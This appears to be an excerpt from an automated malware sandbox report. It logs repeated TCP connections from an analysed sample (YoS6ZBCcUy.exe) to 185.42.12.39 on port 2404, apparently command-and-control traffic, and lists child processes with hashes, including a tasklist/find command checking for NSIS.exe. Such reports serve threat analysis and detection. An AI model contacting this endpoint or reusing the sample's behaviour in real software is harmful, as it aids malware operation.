                                                                                                                                                                                            Dec 6, 2024 17:35:57.007356882 CET240450020185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:57.013452053 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.013720036 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.133332968 CET240450020185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:57.133403063 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.842669964 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.962865114 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:57.963071108 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.966814041 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:58.087450981 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:59.291481972 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:59.467348099 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:59.527390003 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:59.533458948 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:59.533618927 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:59.653717995 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:59.653795958 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:00.327493906 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:00.448059082 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:00.448168039 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:00.453567982 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:00.574645042 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:01.776634932 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:01.857960939 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.011974096 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:02.014508009 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.014601946 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.134402990 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:02.134480000 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.780652046 CET500392404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.900568008 CET240450039185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:30.608603954 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.728512049 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:30.728635073 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.732094049 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.852020025 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.060560942 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.170485973 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.295893908 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.298274040 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.298315048 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.418103933 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.418371916 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.796174049 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.916052103 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.916235924 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.921149969 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:33.041259050 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:34.244076014 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:34.467369080 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:34.479444027 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:34.484607935 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:34.484627008 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:34.604685068 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:34.606451988 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:34.968017101 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:35.088114023 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:35.088210106 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:35.093431950 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:35.213177919 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:36.416269064 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:36.467369080 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:36.651453972 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:36.653712988 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:36.653770924 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:36.773777962 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:36.773834944 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:37.124177933 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:37.244299889 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:37.244390965 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:37.249855995 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:37.369734049 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:38.581029892 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:38.654870033 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:38.899275064 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:38.905792952 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:38.905838966 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.025852919 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:39.026468992 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.358719110 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.479008913 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:39.480711937 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.484477043 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.967457056 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.975332022 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:40.087624073 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.185787916 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.264249086 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.423572063 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.428806067 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.430373907 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.548803091 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.548896074 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.858477116 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.978357077 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.982466936 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.986860037 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:42.109375000 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:43.312417984 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:43.381072044 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:43.547255993 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:43.550769091 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:43.550846100 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:43.674555063 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:43.674647093 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:43.967972040 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:44.088427067 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:44.090482950 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:44.094254971 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:44.216752052 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:45.421555042 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:45.467396021 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:45.655432940 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:45.657672882 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:45.657708883 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:45.777631998 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:45.777724028 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:46.061877012 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:46.181864977 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:46.181946039 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:46.187376976 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:46.307456970 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:47.526582003 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:47.620611906 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:47.771168947 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:47.773983955 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:47.774066925 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:47.893892050 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:47.894025087 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:48.171103954 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:48.291064024 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:48.291156054 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:48.295090914 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:48.416135073 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:49.628876925 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:49.764287949 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:49.865150928 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:49.868669033 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:49.870398045 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:49.988828897 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:49.988898039 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.283237934 CET240450086185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:14.283550024 CET500862404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.421056986 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.540910006 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:14.541026115 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.545455933 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.666333914 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:15.887799978 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:15.967473984 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.127171993 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:16.129487038 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.129527092 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.253703117 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:16.253880978 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.374254942 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.495871067 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:16.498548985 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.502139091 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.622117996 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:17.831861019 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:17.960639000 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.068331003 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:18.116353035 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.116425037 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.236309052 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:18.236377954 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.376221895 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.503377914 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:18.503519058 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.508232117 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.678874016 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:19.890795946 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:19.967484951 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.123204947 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:20.125659943 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.125725985 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.245470047 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:20.245603085 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.358730078 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.479378939 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:20.479554892 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.484055042 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.603939056 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:21.821254015 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:21.967521906 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.063939095 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:22.066346884 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.066346884 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.187714100 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:22.187886000 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.296135902 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.416904926 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:22.417231083 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.424549103 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.544503927 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:23.747515917 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:23.967485905 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:23.983113050 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:23.985323906 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:23.985356092 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.105202913 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:24.105297089 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.202569008 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.322474003 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:24.322582960 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.326387882 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.446266890 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:25.652582884 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:25.764586926 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:25.887375116 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:25.890181065 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:25.890182018 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.011172056 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:26.011301994 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.108665943 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.230360985 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:26.230669022 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.236493111 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.357255936 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:27.569355011 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:27.655095100 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:27.803343058 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:27.809024096 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:27.809024096 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:27.929433107 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:27.929563999 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:28.014857054 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:28.135016918 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:28.135565996 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:28.139074087 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:28.258800030 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:29.461975098 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:29.674496889 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:29.710803986 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:29.716867924 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:29.716867924 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:29.837847948 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:29.840981007 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:29.924525023 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:30.044905901 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:30.048516035 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:30.059823990 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:30.181395054 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.380700111 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.467514992 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.655452967 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.658495903 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.658560991 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.779010057 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.779098034 CET500952404192.168.2.4185.42.12.39


                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:11:33:25
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\YoS6ZBCcUy.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:84'269'376 bytes
                                                                                                                                                                                            MD5 hash:9E19FD2499E9FFB9CA4EAB08D9054A86
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:11:33:27
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe"
                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:11:33:27
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:11:33:27
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv
                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                            Start time:11:33:27
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\system32\find.exe" "NSIS.exe"
                                                                                                                                                                                            Imagebase:0xc30000
                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                            MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate
